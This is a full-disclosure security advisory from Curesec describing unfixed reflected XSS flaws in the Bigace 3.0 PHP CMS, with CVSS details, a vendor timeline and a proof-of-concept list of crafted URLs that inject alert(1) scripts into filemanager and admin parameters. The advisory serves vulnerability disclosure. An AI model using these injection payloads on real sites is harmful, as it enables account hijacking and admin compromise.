28 Jan 2016

Bigace 3.0: XSS

Security Advisory – Curesec Research Team

1. Introduction

Affected Product: Bigace 3.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.bigace.de/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 01/28/2016
Release mode: Full Disclosure
CVE: requested, but not assigned
Credits Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

Bigace is a CMS written in PHP. In version 3.0, there are various reflected XSS vulnerabilities. This can lead to the injection of JavaScript keyloggers, or the bypassing of CSRF protection. In this case, this may lead to code execution via a file uploader in the admin area.

3. Proof of Concept

http://localhost/bigace_3.0/public/index.php/filemanager/upload/index/?itemtype=4&language="><script>alert(1)</script> http://localhost/bigace_3.0/public/index.php/filemanager/categories/index/?itemtype=4&language="><script>alert(1)</script> http://localhost/bigace_3.0/public/index.php/filemanager/index/index/?id=-1&additional=CKEditor|CKEditorFuncNum&CKEditor=editorContent";}alert(1);function foo(){var foo=" http://localhost/bigace_3.0/public/index.php/filemanager/index/index/?id=-1&additional=CKEditor|CKEditorFuncNum&CKEditorFuncNum=";}alert(1);function foo(){var foo=" http://localhost/bigace_3.0/public/index.php/filemanager/index/index/?id=-1&jsfunction=SetUrl|url';}alert(1);function foo(){var foo=' http://localhost/bigace_3.0/public/index.php/filemanager/index/index/?id=-1&jsfunction=SetUrl</script><img src=no onerror=alert(1)>|url http://localhost/bigace_3.0/public/index.php/admin/profile/index/%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2531%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e http://localhost/bigace_3.0/public/index.php/admin/logging/index/en?start=1&amount=20&namespace=system&level="><script>alert(1)</script>&showLogs=Show http://localhost/bigace_3.0/public/index.php/admin/logging/index/en?start="><script>alert(1)</script>&amount=20&namespace=system&level=1&showLogs=Show

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 CVE Requested, but not assigned
12/10/2015 Reminded Vendor of Disclosure Date
12/14/2015 Vendor requests more time
01/10/2015 Reminded Vendor of Disclosure Date
01/17/2015 Vendor discontinued project
01/28/2016 Disclosed to public